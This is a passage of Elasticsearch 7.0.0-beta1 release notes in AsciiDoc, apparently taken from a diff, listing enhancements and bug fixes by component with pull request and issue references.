based optimistic concurrency control to UpdateRequest {es-pull}37872[#37872] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Introduce ssl settings to reindex from remote {es-pull}37527[#37527] (issues: {es-issue}29755[#29755], {es-issue}37287[#37287]) -* Use Sequence number powered OCC for processing updates {es-pull}37308[#37308] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Document Seq No powered optimistic concurrency control 
{es-pull}37284[#37284] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Enable IPv6 URIs in reindex from remote {es-pull}36874[#36874] -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Set acking timeout to 0 on dynamic mapping update {es-pull}31140[#31140] (issues: {es-issue}30672[#30672], {es-issue}30844[#30844]) - -Distributed:: -* Recover retention leases during peer recovery {es-pull}38435[#38435] (issue: {es-issue}37165[#37165]) -* Lift retention lease expiration to index shard {es-pull}38380[#38380] (issues: {es-issue}37165[#37165], {es-issue}37963[#37963], {es-issue}38070[#38070]) -* Introduce retention lease background sync {es-pull}38262[#38262] (issue: {es-issue}37165[#37165]) -* Allow shards of closed indices to be replicated as regular shards {es-pull}38024[#38024] (issue: {es-issue}33888[#33888]) -* Expose retention leases in shard stats {es-pull}37991[#37991] (issue: {es-issue}37165[#37165]) -* Introduce retention leases versioning {es-pull}37951[#37951] (issue: {es-issue}37165[#37165]) -* Soft-deletes policy should always fetch latest leases {es-pull}37940[#37940] (issues: {es-issue}37165[#37165], {es-issue}37375[#37375]) -* Sync retention leases on expiration {es-pull}37902[#37902] (issue: {es-issue}37165[#37165]) -* Ignore shard started requests when primary term does not match {es-pull}37899[#37899] (issue: {es-issue}33888[#33888]) -* Move update and delete by query to use seq# for optimistic concurrency control {es-pull}37857[#37857] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148], {es-issue}37639[#37639]) -* Introduce retention lease serialization {es-pull}37447[#37447] (issues: {es-issue}37165[#37165], {es-issue}37398[#37398]) -* Add run under primary permit method {es-pull}37440[#37440] (issue: {es-issue}37398[#37398]) -* Introduce retention lease syncing {es-pull}37398[#37398] (issue: {es-issue}37165[#37165]) -* Introduce retention lease persistence {es-pull}37375[#37375] (issue: {es-issue}37165[#37165]) -* Add validation for retention lease construction {es-pull}37312[#37312] (issue: {es-issue}37165[#37165]) -* Introduce retention lease expiration {es-pull}37195[#37195] (issue: {es-issue}37165[#37165]) -* Introduce shard history retention leases {es-pull}37167[#37167] (issue: {es-issue}37165[#37165]) -* [Close Index API] Add unique UUID to ClusterBlock {es-pull}36775[#36775] -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Propagate tasks ids between Freeze, Close and Verify Shard actions {es-pull}36630[#36630] -* Always initialize the global checkpoint {es-pull}34381[#34381] - -Engine:: -* Specialize pre-closing checks for engine implementations {es-pull}38702[#38702] -* Ensure that max seq # is equal to the global checkpoint when creating ReadOnlyEngines {es-pull}37426[#37426] -* Enable Bulk-Merge if all source remains {es-pull}37269[#37269] -* Rename 
setting to enable mmap {es-pull}37070[#37070] (issue: {es-issue}36668[#36668]) -* Add hybridfs store type {es-pull}36668[#36668] -* Introduce time-based retention policy for soft-deletes {es-pull}34943[#34943] (issue: {es-issue}34908[#34908]) -* handle AsyncAfterWriteAction failure on primary in the same way as failures on replicas {es-pull}31969[#31969] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) - -Features/CAT APIs:: -* Expose `search.throttled` on `_cat/indices` {es-pull}37073[#37073] (issue: {es-issue}34352[#34352]) - -Features/Features:: -* Run Node deprecation checks locally (#38065) {es-pull}38250[#38250] (issue: {es-issue}38065[#38065]) - -Features/ILM:: -* Ensure ILM policies run safely on leader indices {es-pull}38140[#38140] (issue: {es-issue}34648[#34648]) -* Skip Shrink when numberOfShards not changed {es-pull}37953[#37953] (issue: {es-issue}33275[#33275]) -* Inject Unfollow before Rollover and Shrink {es-pull}37625[#37625] (issue: {es-issue}34648[#34648]) -* Add set_priority action to ILM {es-pull}37397[#37397] (issue: {es-issue}36905[#36905]) -* [ILM] Add Freeze Action {es-pull}36910[#36910] (issue: {es-issue}34630[#34630]) - -Features/Indices APIs:: -* New mapping signature and mapping string source fixed. {es-pull}37401[#37401] - -Features/Ingest:: -* ingest: compile mustache template only if field includes '{{'' {es-pull}37207[#37207] (issue: {es-issue}37120[#37120]) -* Move ingest-geoip default databases out of config {es-pull}36949[#36949] (issue: {es-issue}36898[#36898]) -* Make the ingest-geoip databases even lazier to load {es-pull}36679[#36679] -* Updates the grok patterns to be consistent with the logstash {es-pull}27181[#27181] - -Features/Java High Level REST Client:: -* HLRC: Fix strict setting exception handling {es-pull}37247[#37247] (issue: {es-issue}37090[#37090]) -* HLRC: Use nonblocking entity for requests {es-pull}32249[#32249] - -Features/Monitoring:: -* Adding mapping for hostname field {es-pull}37288[#37288] - -Features/Stats:: -* Stats: Add JVM dns cache expiration config to JvmInfo {es-pull}36372[#36372] - -Features/Watcher:: -* Move watcher to use seq# and primary term for concurrency control {es-pull}37977[#37977] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Use ILM for Watcher history deletion {es-pull}37443[#37443] (issue: {es-issue}32041[#32041]) -* Watcher: Add whitelist to HttpClient {es-pull}36817[#36817] (issue: {es-issue}29937[#29937]) - -Infra/Core:: -* fix a few versionAdded values in ElasticsearchExceptions {es-pull}37877[#37877] -* Add simple method to write collection of writeables {es-pull}37448[#37448] (issue: {es-issue}37398[#37398]) -* Date/Time parsing: Use java time API instead of exception handling {es-pull}37222[#37222] -* [API] spelling: interruptible {es-pull}37049[#37049] (issue: {es-issue}37035[#37035]) - -Infra/Logging:: -* Trim the JSON source in indexing slow logs {es-pull}38081[#38081] (issue: {es-issue}38080[#38080]) -* Optimize warning header de-duplication {es-pull}37725[#37725] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597], {es-issue}37622[#37622]) -* Remove warn-date from warning headers {es-pull}37622[#37622] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597]) -* Add some deprecation optimizations {es-pull}37597[#37597] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) -* Only update response headers if we have a new one {es-pull}37590[#37590] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) - 
-Infra/Packaging:: -* Add OS/architecture classifier to distributions {es-pull}37881[#37881] -* Change file descriptor limit to 65535 {es-pull}37537[#37537] (issue: {es-issue}35839[#35839]) -* Exit batch files explicitly using ERRORLEVEL {es-pull}29583[#29583] (issue: {es-issue}29582[#29582]) - -Infra/Scripting:: -* Add getZone to JodaCompatibleZonedDateTime {es-pull}37084[#37084] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] - -Infra/Settings:: -* Separate out validation of groups of settings {es-pull}34184[#34184] - -License:: -* Handle malformed license signatures {es-pull}37137[#37137] (issue: {es-issue}35340[#35340]) - -Machine Learning:: -* Move ML Optimistic Concurrency Control to Seq No {es-pull}38278[#38278] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* [ML] Add explanation so far to file structure finder exceptions {es-pull}38191[#38191] (issue: {es-issue}29821[#29821]) -* ML: Add reason field in JobTaskState {es-pull}38029[#38029] (issue: {es-issue}34431[#34431]) -* [ML] Add _meta information to all ML indices {es-pull}37964[#37964] -* ML: Add upgrade mode docs, hlrc, and fix bug {es-pull}37942[#37942] -* [ML] Tighten up use of aliases rather than concrete indices {es-pull}37874[#37874] -* ML: Add support for single bucket aggs in Datafeeds {es-pull}37544[#37544] (issue: {es-issue}36838[#36838]) -* [ML] Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* [ML] Merge the Jindex master feature branch {es-pull}36702[#36702] (issue: {es-issue}32905[#32905]) -* [FEATURE][ML] Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) - -Mapping:: -* Log document id when MapperParsingException occurs {es-pull}37800[#37800] (issue: {es-issue}37658[#37658]) -* [API] spelling: unknown {es-pull}37056[#37056] (issue: {es-issue}37035[#37035]) -* Make SourceToParse immutable {es-pull}36971[#36971] -* Use index-prefix fields for terms of length min_chars - 1 {es-pull}36703[#36703] - -Network:: -* Enable TLSv1.3 by default for JDKs with support {es-pull}38103[#38103] (issue: {es-issue}32276[#32276]) - -Recovery:: -* SyncedFlushService.getShardRoutingTable() should use metadata to check for index existence {es-pull}37691[#37691] (issue: {es-issue}33888[#33888]) -* Make prepare engine step of recovery source non-blocking {es-pull}37573[#37573] (issue: {es-issue}37174[#37174]) -* Make recovery source send operations non-blocking {es-pull}37503[#37503] (issue: {es-issue}37458[#37458]) -* Prepare to make send translog of recovery non-blocking {es-pull}37458[#37458] (issue: {es-issue}37291[#37291]) -* Make finalize step of recovery source non-blocking {es-pull}37388[#37388] (issue: {es-issue}37291[#37291]) -* Make recovery source partially non-blocking {es-pull}37291[#37291] (issue: {es-issue}36195[#36195]) -* Do not mutate RecoveryResponse {es-pull}37204[#37204] (issue: {es-issue}37174[#37174]) -* Don't block on peer recovery on the target side {es-pull}37076[#37076] (issue: {es-issue}36195[#36195]) -* Reduce recovery time with compress or secure transport {es-pull}36981[#36981] (issue: {es-issue}33844[#33844]) -* Translog corruption marker {es-pull}33415[#33415] (issue: {es-issue}31389[#31389]) - -Rollup:: -* Replace the TreeMap in the composite aggregation {es-pull}36675[#36675] - -SQL:: -* SQL: Allow look-ahead resolution of aliases for WHERE clause {es-pull}38450[#38450] (issue: {es-issue}29983[#29983]) -* SQL: Implement 
CURRENT_DATE {es-pull}38175[#38175] (issue: {es-issue}38160[#38160]) -* SQL: Generate relevant error message when grouping functions are not used in GROUP BY {es-pull}38017[#38017] (issue: {es-issue}37952[#37952]) -* SQL: Skip the nested and object field types in case of an ODBC request {es-pull}37948[#37948] (issue: {es-issue}37801[#37801]) -* SQL: Add protocol tests and remove jdbc_type from drivers response {es-pull}37516[#37516] (issues: {es-issue}36635[#36635], {es-issue}36882[#36882]) -* SQL: Remove slightly used meta commands {es-pull}37506[#37506] (issue: {es-issue}37409[#37409]) -* SQL: Describe aliases as views {es-pull}37496[#37496] (issue: {es-issue}37422[#37422]) -* SQL: Make `FULL` non-reserved keyword in the grammar {es-pull}37377[#37377] (issue: {es-issue}37376[#37376]) -* SQL: Use declared source for error messages {es-pull}37161[#37161] -* SQL: Improve error message when unable to translate to ES query DSL {es-pull}37129[#37129] (issue: {es-issue}37040[#37040]) -* [API] spelling: subtract {es-pull}37055[#37055] (issue: {es-issue}37035[#37035]) -* [API] spelling: similar {es-pull}37054[#37054] (issue: {es-issue}37035[#37035]) -* [API] spelling: input {es-pull}37048[#37048] (issue: {es-issue}37035[#37035]) -* SQL: Enhance message for PERCENTILE[_RANK] with field as 2nd arg {es-pull}36933[#36933] (issue: {es-issue}36903[#36903]) -* SQL: Preserve original source for each expression {es-pull}36912[#36912] (issue: {es-issue}36894[#36894]) -* SQL: Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* SQL: Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) - -Search:: -* Tie break on cluster alias when merging shard search failures {es-pull}38715[#38715] (issue: {es-issue}38672[#38672]) -* Add finalReduce flag to SearchRequest {es-pull}38104[#38104] (issues: {es-issue}37000[#37000], {es-issue}37838[#37838]) -* Streamline skip_unavailable handling {es-pull}37672[#37672] (issue: {es-issue}32125[#32125]) -* Expose sequence number and primary terms in search responses {es-pull}37639[#37639] -* Add support for merging multiple search responses into one {es-pull}37566[#37566] (issue: {es-issue}32125[#32125]) -* Allow field types to optimize phrase prefix queries {es-pull}37436[#37436] (issue: {es-issue}31921[#31921]) -* Add support for providing absolute start time to SearchRequest {es-pull}37142[#37142] (issue: {es-issue}32125[#32125]) -* Ensure that local cluster alias is never treated as remote {es-pull}37121[#37121] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* [API] spelling: cacheable {es-pull}37047[#37047] (issue: {es-issue}37035[#37035]) -* Add ability to suggest shard_size on coord node rewrite {es-pull}37017[#37017] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997], {es-issue}37000[#37000]) -* Skip final reduction if SearchRequest holds a cluster alias {es-pull}37000[#37000] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* Add support for local cluster alias to SearchRequest {es-pull}36997[#36997] (issue: {es-issue}32125[#32125]) -* Use SearchRequest copy constructor in ExpandSearchPhase {es-pull}36772[#36772] (issue: {es-issue}36641[#36641]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) - -Security:: -* Move CAS operations in TokenService to sequence numbers {es-pull}38311[#38311] (issues: {es-issue}10708[#10708], 
{es-issue}37872[#37872]) -* Cleanup construction of interceptors {es-pull}38294[#38294] -* Add passphrase support to elasticsearch-keystore {es-pull}37472[#37472] (issue: {es-issue}32691[#32691]) - -Snapshot/Restore:: -* RestoreService should update primary terms when restoring shards of existing indices {es-pull}38177[#38177] (issue: {es-issue}33888[#33888]) -* Allow open indices to be restored {es-pull}37733[#37733] -* Create specific exception for when snapshots are in progress {es-pull}37550[#37550] (issue: {es-issue}37541[#37541]) -* SNAPSHOT: Make Atomic Blob Writes Mandatory {es-pull}37168[#37168] (issues: {es-issue}37011[#37011], {es-issue}37066[#37066]) -* SNAPSHOT: Speed up HDFS Repository Writes {es-pull}37069[#37069] -* Implement Atomic Blob Writes for HDFS Repository {es-pull}37066[#37066] (issue: {es-issue}37011[#37011]) -* [API] spelling: repositories {es-pull}37053[#37053] (issue: {es-issue}37035[#37035]) -* SNAPSHOT: Use CancellableThreads to Abort {es-pull}35901[#35901] (issue: {es-issue}21759[#21759]) -* WIP: S3 client encryption {es-pull}30513[#30513] (issues: {es-issue}11128[#11128], {es-issue}16843[#16843]) - -Suggesters:: -* Remove unused empty constructors from suggestions classes {es-pull}37295[#37295] -* [API] spelling: likelihood {es-pull}37052[#37052] (issue: {es-issue}37035[#37035]) - -ZenDiscovery:: -* Add elasticsearch-node detach-cluster tool {es-pull}37979[#37979] -* Deprecate minimum_master_nodes {es-pull}37868[#37868] -* Step down as master when configured out of voting configuration {es-pull}37802[#37802] (issue: {es-issue}37712[#37712]) -* Enforce cluster UUIDs {es-pull}37775[#37775] -* Bubble exceptions up in ClusterApplierService {es-pull}37729[#37729] -* Use m_m_nodes from Zen1 master for Zen2 bootstrap {es-pull}37701[#37701] -* Add tool elasticsearch-node unsafe-bootstrap {es-pull}37696[#37696] -* Report terms and version if cluster does not form {es-pull}37473[#37473] -* Bootstrap a Zen2 cluster once quorum is discovered {es-pull}37463[#37463] -* Zen2: Add join validation {es-pull}37203[#37203] -* Publish cluster states in chunks {es-pull}36973[#36973] - - - -[[bug-7.0.0-beta1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Don't load global ordinals with the `map` execution_hint {es-pull}37833[#37833] (issue: {es-issue}37705[#37705]) -* Issue #37303 - Invalid variance fix {es-pull}37384[#37384] (issue: {es-issue}37303[#37303]) - -Allocation:: -* Fix _host based require filters {es-pull}38173[#38173] -* ALLOC: Fail Stale Primary Alloc. Req. without Data {es-pull}37226[#37226] (issue: {es-issue}37098[#37098]) - -Audit:: -* Fix NPE in Logfile Audit Filter {es-pull}38120[#38120] (issue: {es-issue}38097[#38097]) - -Authentication:: -* Enhance parsing of StatusCode in SAML Responses {es-pull}38628[#38628] -* Limit token expiry to 1 hour maximum {es-pull}38244[#38244] -* Fix expired token message in Exception header {es-pull}37196[#37196] -* Fix NPE in CachingUsernamePasswordRealm {es-pull}36953[#36953] (issue: {es-issue}36951[#36951]) - -CCR:: -* Prevent CCR recovery from missing documents {es-pull}38237[#38237] -* Fix file reading in ccr restore service {es-pull}38117[#38117] -* Correct argument names in update mapping/settings from leader {es-pull}38063[#38063] -* Ensure changes requests return the latest mapping version {es-pull}37633[#37633] -* Do not set fatal exception when shard follow task is stopped. 
{es-pull}37603[#37603] -* Add fatal_exception field for ccr stats in monitoring mapping {es-pull}37563[#37563] -* Do not add index event listener if CCR disabled {es-pull}37432[#37432] -* When removing an AutoFollower also mark it as removed. {es-pull}37402[#37402] (issue: {es-issue}36761[#36761]) -* [CCR] Make shard follow tasks more resilient for restarts {es-pull}37239[#37239] (issue: {es-issue}37231[#37231]) -* [CCR] Resume follow Api should not require a request body {es-pull}37217[#37217] (issue: {es-issue}37022[#37022]) -* [CCR] Report error if auto follower tries auto follow a leader index with soft deletes disabled {es-pull}36886[#36886] (issue: {es-issue}33007[#33007]) -* Remote cluster license checker and no license info. {es-pull}36837[#36837] (issue: {es-issue}36815[#36815]) -* Make CCR resilient against missing remote cluster connections {es-pull}36682[#36682] (issues: {es-issue}36255[#36255], {es-issue}36667[#36667]) -* [CCR] AutoFollowCoordinator and follower index already created {es-pull}36540[#36540] (issue: {es-issue}33007[#33007]) - -CRUD:: -* Fix Reindex from remote query logic {es-pull}36908[#36908] -* Synchronize WriteReplicaResult callbacks {es-pull}36770[#36770] - -Distributed:: -* TransportVerifyShardBeforeCloseAction should force a flush {es-pull}38401[#38401] (issues: {es-issue}33888[#33888], {es-issue}37961[#37961]) -* Fix limit on retaining sequence number {es-pull}37992[#37992] (issue: {es-issue}37165[#37165]) -* Close Index API should force a flush if a sync is needed {es-pull}37961[#37961] (issues: {es-issue}33888[#33888], {es-issue}37426[#37426]) -* Force Refresh Listeners when Acquiring all Operation Permits {es-pull}36835[#36835] -* Replaced the word 'shards' with 'replicas' in an error message. (#36234) {es-pull}36275[#36275] (issue: {es-issue}36234[#36234]) - -Engine:: -* Subclass NIOFSDirectory instead of using FileSwitchDirectory {es-pull}37140[#37140] (issues: {es-issue}36668[#36668], {es-issue}37111[#37111]) - -Features/ILM:: -* Preserve ILM operation mode when creating new lifecycles {es-pull}38134[#38134] (issues: {es-issue}38229[#38229], {es-issue}38230[#38230]) -* Retry ILM steps that fail due to SnapshotInProgressException {es-pull}37624[#37624] (issues: {es-issue}37541[#37541], {es-issue}37552[#37552]) -* Remove `indexing_complete` when removing policy {es-pull}36620[#36620] - -Features/Indices APIs:: -* Reject delete index requests with a body {es-pull}37501[#37501] (issue: {es-issue}8217[#8217]) -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Get Aliases with wildcard exclusion expression {es-pull}34230[#34230] (issues: {es-issue}33518[#33518], {es-issue}33805[#33805], {es-issue}34144[#34144]) - -Features/Ingest:: -* Support unknown fields in ingest pipeline map configuration {es-pull}38352[#38352] (issue: {es-issue}36938[#36938]) -* Ingest node - user_agent, move device parsing to an object {es-pull}38115[#38115] (issues: {es-issue}37329[#37329], {es-issue}38094[#38094]) -* ingest: fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* ingest: support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) - -Features/Java High Level REST Client:: -* Update IndexTemplateMetadata to allow unknown fields {es-pull}38448[#38448] (issue: {es-issue}36938[#36938]) -* `if_seq_no` and `if_primary_term` parameters aren't wired correctly in REST Client's CRUD API {es-pull}38411[#38411] -* Update Rollup Caps to 
allow unknown fields {es-pull}38339[#38339] (issue: {es-issue}36938[#36938]) -* Fix ILM explain response to allow unknown fields {es-pull}38054[#38054] (issue: {es-issue}36938[#36938]) -* Fix ILM status to allow unknown fields {es-pull}38043[#38043] (issue: {es-issue}36938[#36938]) -* Fix ILM Lifecycle Policy to allow unknown fields {es-pull}38041[#38041] (issue: {es-issue}36938[#36938]) -* Update authenticate to allow unknown fields {es-pull}37713[#37713] (issue: {es-issue}36938[#36938]) -* Update verify repository to allow unknown fields {es-pull}37619[#37619] (issue: {es-issue}36938[#36938]) -* Update get users to allow unknown fields {es-pull}37593[#37593] (issue: {es-issue}36938[#36938]) -* Update Execute Watch to allow unknown fields {es-pull}37498[#37498] (issue: {es-issue}36938[#36938]) -* Update Put Watch to allow unknown fields {es-pull}37494[#37494] (issue: {es-issue}36938[#36938]) -* Update Delete Watch to allow unknown fields {es-pull}37435[#37435] (issue: {es-issue}36938[#36938]) -* Fix rest reindex test for IPv4 addresses {es-pull}37310[#37310] -* Fix weighted_avg parser not found for RestHighLevelClient {es-pull}37027[#37027] (issue: {es-issue}36861[#36861]) - -Features/Java Low Level REST Client:: -* Fix potential IllegalCapacityException in LLRC when selecting nodes {es-pull}37821[#37821] - -Features/Monitoring:: -* Allow built-in monitoring_user role to call GET _xpack API {es-pull}38060[#38060] (issue: {es-issue}37970[#37970]) - -Features/Watcher:: -* Support merge nested Map in list for JIRA configurations {es-pull}37634[#37634] (issue: {es-issue}30068[#30068]) -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Ensures watch definitions are valid json {es-pull}30692[#30692] (issue: {es-issue}29746[#29746]) - -Geo:: -* Fix GeoHash PrefixTree BWC {es-pull}38584[#38584] (issue: {es-issue}38494[#38494]) -* Geo: Do not normalize the longitude with value -180 for Lucene shapes {es-pull}37299[#37299] (issue: {es-issue}37297[#37297]) - -Infra/Core:: -* Bubble-up exceptions from scheduler {es-pull}38317[#38317] (issue: {es-issue}38014[#38014]) -* Core: Revert back to joda's multi date formatters {es-pull}36814[#36814] (issues: {es-issue}36447[#36447], {es-issue}36602[#36602]) -* Propagate Errors in executors to uncaught exception handler {es-pull}36137[#36137] (issue: {es-issue}28667[#28667]) - -Infra/Packaging:: -* Remove NOREPLACE for /etc/elasticsearch in rpm and deb {es-pull}37839[#37839] -* Packaging: Update marker used to allow ELASTIC_PASSWORD {es-pull}37243[#37243] (issue: {es-issue}37240[#37240]) -* Packaging: Remove permission editing in postinst {es-pull}37242[#37242] (issue: {es-issue}37143[#37143]) - -Infra/REST API:: -* Reject all requests that have an unconsumed body {es-pull}37504[#37504] (issues: {es-issue}30792[#30792], {es-issue}37501[#37501], {es-issue}8217[#8217]) - -Infra/Scripting:: -* Fix Painless void return bug {es-pull}38046[#38046] - -Infra/Settings:: -* Fix setting by time unit {es-pull}37192[#37192] -* Fix handling of fractional byte size value settings {es-pull}37172[#37172] -* Fix handling of fractional time value settings {es-pull}37171[#37171] - -Machine Learning:: -* [ML] Report index unavailable instead of waiting for lazy node {es-pull}38423[#38423] -* ML: Fix error race condition on stop _all datafeeds and close _all jobs {es-pull}38113[#38113] (issue: {es-issue}37959[#37959]) -* [ML] Update ML results mappings on process start {es-pull}37706[#37706] (issue: {es-issue}37607[#37607]) -* [ML] Prevent submit after autodetect 
worker is stopped {es-pull}37700[#37700] (issue: {es-issue}37108[#37108]) -* [ML] Fix ML datafeed CCS with wildcarded cluster name {es-pull}37470[#37470] (issue: {es-issue}36228[#36228]) -* [ML] Update error message for process update {es-pull}37363[#37363] -* [ML] Wait for autodetect to be ready in the datafeed {es-pull}37349[#37349] (issues: {es-issue}36810[#36810], {es-issue}37227[#37227]) -* [ML] Stop datafeeds running when their jobs are stale {es-pull}37227[#37227] (issue: {es-issue}36810[#36810]) -* [ML] Order GET job stats response by job id {es-pull}36841[#36841] (issue: {es-issue}36683[#36683]) -* [ML] Make GetJobStats work with arbitrary wildcards and groups {es-pull}36683[#36683] (issue: {es-issue}34745[#34745]) - -Mapping:: -* Treat put-mapping calls with `_doc` as a top-level key as typed calls. {es-pull}38032[#38032] -* Correct deprec log in RestGetFieldMappingAction {es-pull}37843[#37843] (issue: {es-issue}37667[#37667]) -* Restore a noop _all metadata field for 6x indices {es-pull}37808[#37808] (issue: {es-issue}37429[#37429]) -* Make sure PutMappingRequest accepts content types other than JSON. {es-pull}37720[#37720] -* Make sure to use the resolved type in DocumentMapperService#extractMappings. {es-pull}37451[#37451] (issue: {es-issue}36811[#36811]) -* MAPPING: Improve Precision for scaled_float {es-pull}37169[#37169] (issue: {es-issue}32570[#32570]) -* Make sure to accept empty unnested mappings in create index requests. {es-pull}37089[#37089] -* Stop automatically nesting mappings in index creation requests. {es-pull}36924[#36924] -* Rewrite SourceToParse with resolved docType {es-pull}36921[#36921] (issues: {es-issue}35790[#35790], {es-issue}36769[#36769]) - -Network:: -* Reload SSL context on file change for LDAP {es-pull}36937[#36937] (issues: {es-issue}30509[#30509], {es-issue}36923[#36923]) -* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658]) - -Ranking:: -* QueryRescorer should keep the window size when rewriting {es-pull}36836[#36836] - -Recovery:: -* RecoveryMonitor#lastSeenAccessTime should be volatile {es-pull}36781[#36781] - -Rollup:: -* Fix Rollup's metadata parser {es-pull}36791[#36791] (issue: {es-issue}36726[#36726]) -* Fix rollup search statistics {es-pull}36674[#36674] - -SQL:: -* SQL: Prevent grouping over grouping functions {es-pull}38649[#38649] (issue: {es-issue}38308[#38308]) -* SQL: Relax StackOverflow circuit breaker for constants {es-pull}38572[#38572] (issue: {es-issue}38571[#38571]) -* SQL: Fix issue with IN not resolving to underlying keyword field {es-pull}38440[#38440] (issue: {es-issue}38424[#38424]) -* SQL: change the Intervals milliseconds precision to 3 digits {es-pull}38297[#38297] (issue: {es-issue}37423[#37423]) -* SQL: Fix esType for DATETIME/DATE and INTERVALS {es-pull}38179[#38179] (issue: {es-issue}38051[#38051]) -* SQL: Added SSL configuration options tests {es-pull}37875[#37875] (issue: {es-issue}37711[#37711]) -* SQL: Fix casting from date to numeric type to use millis {es-pull}37869[#37869] (issue: {es-issue}37655[#37655]) -* SQL: Fix BasicFormatter NPE {es-pull}37804[#37804] -* SQL: Return Intervals in SQL format for CLI {es-pull}37602[#37602] (issues: {es-issue}29970[#29970], {es-issue}36186[#36186], {es-issue}36432[#36432]) -* SQL: fix object extraction from sources {es-pull}37502[#37502] (issue: {es-issue}37364[#37364]) -* SQL: Fix issue with field names containing "." 
{es-pull}37364[#37364] (issue: {es-issue}37128[#37128]) -* SQL: Fix bug regarding alias fields with dots {es-pull}37279[#37279] (issue: {es-issue}37224[#37224]) -* SQL: Proper handling of COUNT(field_name) and COUNT(DISTINCT field_name) {es-pull}37254[#37254] (issue: {es-issue}30285[#30285]) -* SQL: fix COUNT DISTINCT filtering {es-pull}37176[#37176] (issue: {es-issue}37086[#37086]) -* SQL: Fix issue with wrong NULL optimization {es-pull}37124[#37124] (issue: {es-issue}35872[#35872]) -* SQL: Fix issue with complex expression as args of PERCENTILE/_RANK {es-pull}37102[#37102] (issue: {es-issue}37099[#37099]) -* SQL: Handle the bwc Joda ZonedDateTime scripting class in Painless {es-pull}37024[#37024] (issue: {es-issue}37023[#37023]) -* SQL: Fix bug regarding histograms usage in scripting {es-pull}36866[#36866] -* SQL: Fix issue with always false filter involving functions {es-pull}36830[#36830] (issue: {es-issue}35980[#35980]) -* SQL: protocol returns ISO 8601 String formatted dates instead of Long for JDBC/ODBC requests {es-pull}36800[#36800] (issue: {es-issue}36756[#36756]) -* SQL: Enhance Verifier to prevent aggregate or grouping functions from {es-pull}36799[#36799] (issue: {es-issue}36798[#36798]) -* SQL: Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* SQL: Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* SQL: Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* SQL: Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) - -Search:: -* Look up connection using the right cluster alias when releasing contexts {es-pull}38570[#38570] -* Fix fetch source option in expand search phase {es-pull}37908[#37908] (issue: {es-issue}23829[#23829]) -* Change `rational` to `saturation` in script_score {es-pull}37766[#37766] (issue: {es-issue}37714[#37714]) -* Throw if two inner_hits have the same name {es-pull}37645[#37645] (issue: {es-issue}37584[#37584]) -* Ensure either success or failure path for SearchOperationListener is called {es-pull}37467[#37467] (issue: {es-issue}37185[#37185]) -* `query_string` should use indexed prefixes {es-pull}36895[#36895] -* Avoid duplicate types deprecation messages in search-related APIs. 
{es-pull}36802[#36802] - -Security:: -* Fix exit code for Security CLI tools {es-pull}37956[#37956] (issue: {es-issue}37841[#37841]) -* Fix potential NPE in UsersTool {es-pull}37660[#37660] - -Snapshot/Restore:: -* Fix Concurrent Snapshot Ending And Stabilize Snapshot Finalization {es-pull}38368[#38368] (issue: {es-issue}38226[#38226]) -* Fix Two Races that Lead to Stuck Snapshots {es-pull}37686[#37686] (issues: {es-issue}32265[#32265], {es-issue}32348[#32348]) -* Fix Race in Concurrent Snapshot Delete and Create {es-pull}37612[#37612] (issue: {es-issue}37581[#37581]) -* Streamline S3 Repository- and Client-Settings {es-pull}37393[#37393] - -Suggesters:: -* Fix duplicate removal when merging completion suggestions {es-pull}36996[#36996] (issue: {es-issue}35836[#35836]) - -Task Management:: -* Un-assign persistent tasks as nodes exit the cluster {es-pull}37656[#37656] - -ZenDiscovery:: -* Fix size of rolling-upgrade bootstrap config {es-pull}38031[#38031] -* Always return metadata version if metadata is requested {es-pull}37674[#37674] -* [Zen2] Elect freshest master in upgrade {es-pull}37122[#37122] (issue: {es-issue}40[#40]) -* Fix cluster state persistence for single-node discovery 